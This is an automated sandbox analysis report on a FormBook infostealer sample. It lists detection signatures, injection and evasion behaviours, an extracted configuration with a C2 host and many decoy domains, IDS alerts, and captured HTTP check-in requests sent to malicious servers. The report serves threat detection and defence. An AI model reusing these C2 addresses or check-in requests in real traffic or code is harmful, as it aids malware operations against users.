Windows Analysis Report
7pECKdsaig.exe

Overview

General Information

Sample Name: 7pECKdsaig.exe
Original Sample Name: 3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a.exe
Analysis ID: 830326
MD5: 515bf958f062fec724fbe6bdadf39485
SHA1: 50fbaeb36e98338dc500e252855abf0152bb6bbf
SHA256: 3343ba4097fe8b6b91af0ca46abb0baf6052acf1806571432cc7e9e0ba59fa2a
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: 7pECKdsaig.exe ReversingLabs: Detection: 76%
Source: 7pECKdsaig.exe Virustotal: Detection: 59% Perma Link
Yara detected FormBook
Source: Yara match File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Antivirus / Scanner detection for submitted sample
Source: 7pECKdsaig.exe Avira: detected
Antivirus detection for URL or domain
Source: http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com Avira URL Cloud: Label: malware
Source: http://www.b708.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/ Avira URL Cloud: Label: malware
Source: http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com Avira URL Cloud: Label: malware
Source: http://www.quickhealcareltd.co.uk/ar73/ Avira URL Cloud: Label: malware
Source: http://www.mogi.africa/ar73/www.kellnovaglobalfood.info Avira URL Cloud: Label: malware
Source: http://www.ckpconsulting.com/ar73/www.2348x.com Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ Avira URL Cloud: Label: malware
Source: http://www.ckpconsulting.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.mtevz.online/ar73/ Avira URL Cloud: Label: malware
Source: http://www.2348x.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.arredobagno.club/ar73/www.mtevz.online Avira URL Cloud: Label: malware
Source: http://www.hurricanevalleyatvjamboree.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.ingrambaby.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.innovantexclusive.com/ar73/www.1wwuwa.top Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/ Avira URL Cloud: Label: malware
Source: http://www.echadholisticbar.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.jacksontcpassettlement.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.authenticityhacking.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.ingrambaby.com/ar73/www.arredobagno.club Avira URL Cloud: Label: malware
Source: http://www.mogi.africa/ar73/ Avira URL Cloud: Label: malware
Source: http://www.arredobagno.club/ar73/ Avira URL Cloud: Label: malware
Source: http://www.1wwuwa.top/ar73/www.echadholisticbar.com Avira URL Cloud: Label: malware
Source: http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.com Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ Avira URL Cloud: Label: malware
Source: http://www.authenticityhacking.com/ar73/www.ckpconsulting.com Avira URL Cloud: Label: malware
Source: http://www.mtevz.online/ar73/r Avira URL Cloud: Label: malware
Source: http://www.2348x.com/ar73/www.b708.com Avira URL Cloud: Label: malware
Source: www.2348x.com/ar73/ Avira URL Cloud: Label: malware
Source: http://www.1wwuwa.top/ar73/ Avira URL Cloud: Label: malware
Source: http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com Avira URL Cloud: Label: malware
Source: http://www.innovantexclusive.com/ar73/ Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: 7pECKdsaig.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.7pECKdsaig.exe.a80000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.2348x.com/ar73/"], "decoy": ["classgorilla.com", "b6817.com", "1wwuwa.top", "dgslimited.africa", "deepwaterships.com", "hkshshoptw.shop", "hurricanevalleyatvjamboree.com", "ckpconsulting.com", "laojiangmath.com", "authenticityhacking.com", "family-doctor-53205.com", "investinstgeorgeut.com", "lithoearthsolution.africa", "quickhealcareltd.co.uk", "delightkgrillw.top", "freezeclosettoilet.com", "coo1star.com", "gemgamut.com", "enrichednetworksolutions.com", "betterbeeclean.com", "kbmstr.com", "colorusainc.com", "five-dollar-meals.com", "baozhuang8.com", "la-home-service.com", "innovantexclusive.com", "chateaudevillars.co.uk", "echadholisticbar.com", "naijacarprices.africa", "4652.voto", "kraftheonz.com", "ingrambaby.com", "braeunungsoel.ch", "sweetcariadgifts.co.uk", "kui693.com", "akatov-top.ru", "epollresearch.online", "cupandsaucybooks.com", "arredobagno.club", "gt.sale", "dskincare.com", "cursosemcasa.site", "leaf-spa.net", "deathbeforedeceit.com", "azvvs.com", "laptops-39165.com", "ccwt.vip", "011965.com", "mtevz.online", "jacksontcpassettlement.com", "aldeajerusalen.com", "kellnovaglobalfood.info", "alphametatek.online", "lcssthh.com", "dumelogold9ja.africa", "d-storic.com", "mogi.africa", "ghostt.net", "aksharsigns.online", "goglucofort.com", "b708.com", "controlplus.systems", "lightandstory.info", "invstcai.sbs"]}
Uses 32bit PE files
Source: 7pECKdsaig.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 7pECKdsaig.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: msdt.pdbGCTL source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 7pECKdsaig.exe, 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: msdt.pdb source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 4x nop then pop ebx 0_2_00A87B1A
Source: C:\Users\user\Desktop\7pECKdsaig.exe Code function: 4x nop then pop edi 0_2_00A96CDD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4x nop then pop ebx 2_2_00587B1D
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4x nop then pop edi 2_2_00596CDD

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.controlplus.systems
Source: C:\Windows\explorer.exe Domain query: www.mogi.africa
Source: C:\Windows\explorer.exe Domain query: www.kellnovaglobalfood.info
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.2348x.com/ar73/
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1Host: www.kellnovaglobalfood.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1Host: www.controlplus.systemsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 20 Mar 2023 08:12:27 GMTContent-Type: text/htmlContent-Length: 291ETag: "64063330-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 20 Mar 2023 08:12:47 GMTContent-Type: text/htmlContent-Length: 291ETag: "63fcb05a-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.1wwuwa.top
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.1wwuwa.top/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.1wwuwa.top/ar73/www.echadholisticbar.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.1wwuwa.topReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.2348x.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.2348x.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.2348x.com/ar73/www.b708.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.2348x.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arredobagno.club
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arredobagno.club/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arredobagno.club/ar73/www.mtevz.online
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.arredobagno.clubReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.authenticityhacking.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.authenticityhacking.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.authenticityhacking.com/ar73/www.ckpconsulting.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.authenticityhacking.comReferer:
Source: explorer.exe, 00000001.00000003.461649448.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.292213498.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461216185.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.267709513.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.462393796.000000000F5B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.254183869.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.289061192.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.526453234.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.517440543.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.530310030.000000000F5B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.288711256.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.263735895.0000000008442000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b708.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b708.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.b708.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ckpconsulting.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ckpconsulting.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ckpconsulting.com/ar73/www.2348x.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ckpconsulting.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.controlplus.systems
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.controlplus.systems/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.controlplus.systemsReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.echadholisticbar.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.echadholisticbar.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.echadholisticbar.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hurricanevalleyatvjamboree.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hurricanevalleyatvjamboree.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.hurricanevalleyatvjamboree.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ingrambaby.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ingrambaby.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ingrambaby.com/ar73/www.arredobagno.club
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.ingrambaby.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innovantexclusive.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innovantexclusive.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innovantexclusive.com/ar73/www.1wwuwa.top
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.innovantexclusive.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jacksontcpassettlement.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.jacksontcpassettlement.com/ar73/
